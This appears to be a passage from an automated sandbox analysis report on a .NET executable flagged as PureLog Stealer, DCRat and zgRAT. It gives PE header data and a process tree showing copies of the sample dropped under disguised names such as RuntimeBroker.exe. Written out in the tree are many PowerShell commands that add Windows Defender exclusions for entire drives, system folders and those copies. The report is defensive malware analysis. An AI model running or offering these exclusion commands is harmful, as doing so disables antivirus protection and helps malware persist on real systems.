                                               IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                               IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                               Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                               .text | 0x2000 | 0x1ea6a4 | 0x1ea800 | 789b0e0fee56d5c57c8e9968cc0e9523 | False | 0.7891476132454128 | data | 7.572469597468066 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                               .rsrc | 0x1ee000 | 0x320 | 0x400 | fc29742be686b8c8941fbe272822da99 | False | 0.3544921875 | data | 2.6537284131589467 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                               .reloc | 0x1f0000 | 0xc | 0x200 | eeb7fd52684d3bd3952867d1d963844e | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                               Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                               RT_VERSION | 0x1ee058 | 0x2c8 | data | | | 0.46207865168539325
                                               DLL | Import
                                               mscoree.dll | _CorExeMain
                                              No network behavior found

                                              Target ID:0
                                              Start time:14:16:58
                                              Start date:12/09/2024
                                              Path:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe"
                                              Imagebase:0xa60000
                                              File size:2'011'136 bytes
                                              MD5 hash:B8AA70ED9243F5AA9C8DD45E8B6C01E7
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1239399046.0000000000A62000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1566189118.0000000013111000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              Target ID:11
                                              Start time:14:17:03
                                              Start date:12/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.cmdline"
                                              Imagebase:0x7ff622aa0000
                                              File size:2'759'232 bytes
                                              MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:12
                                              Start time:14:17:03
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:13
                                              Start time:14:17:03
                                              Start date:12/09/2024
                                              Path:C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe"
                                              Imagebase:0xf30000
                                              File size:2'011'136 bytes
                                              MD5 hash:B8AA70ED9243F5AA9C8DD45E8B6C01E7
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 63%, ReversingLabs
                                              Reputation:low
                                              Has exited:true

                                              Target ID:14
                                              Start time:14:17:03
                                              Start date:12/09/2024
                                              Path:C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe"
                                              Imagebase:0x250000
                                              File size:2'011'136 bytes
                                              MD5 hash:B8AA70ED9243F5AA9C8DD45E8B6C01E7
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:15
                                              Start time:14:17:03
                                              Start date:12/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6986.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2072A4DD6B9C45BD955850FB555C1F90.TMP"
                                              Imagebase:0x7ff6404d0000
                                              File size:52'744 bytes
                                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:16
                                              Start time:14:17:04
                                              Start date:12/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4gjcegjf\4gjcegjf.cmdline"
                                              Imagebase:0x7ff622aa0000
                                              File size:2'759'232 bytes
                                              MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:17
                                              Start time:14:17:04
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:18
                                              Start time:14:17:04
                                              Start date:12/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6B99.tmp" "c:\Windows\System32\CSC5918AA24663347D392372538DC1C654.TMP"
                                              Imagebase:0x7ff6404d0000
                                              File size:52'744 bytes
                                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:31
                                              Start time:14:17:05
                                              Start date:12/09/2024
                                              Path:C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe"
                                              Imagebase:0xae0000
                                              File size:2'011'136 bytes
                                              MD5 hash:B8AA70ED9243F5AA9C8DD45E8B6C01E7
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 63%, ReversingLabs
                                              Reputation:low
                                              Has exited:true

                                              Target ID:34
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe"
                                              Imagebase:0xe50000
                                              File size:2'011'136 bytes
                                              MD5 hash:B8AA70ED9243F5AA9C8DD45E8B6C01E7
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:37
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:38
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:39
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:40
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:41
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:42
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:43
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:44
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:45
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:46
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:47
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:48
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:49
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:50
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:51
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:52
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:53
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:54
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:55
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:56
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:57
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:58
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:59
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:60
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:61
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows media player\Network Sharing\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:62
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:63
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\en-US\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:64
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:65
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:66
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:67
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:68
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:69
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:70
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:71
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:72
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:73
                                              Start time:14:17:08
                                              Start date:12/09/2024
                                              Path:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
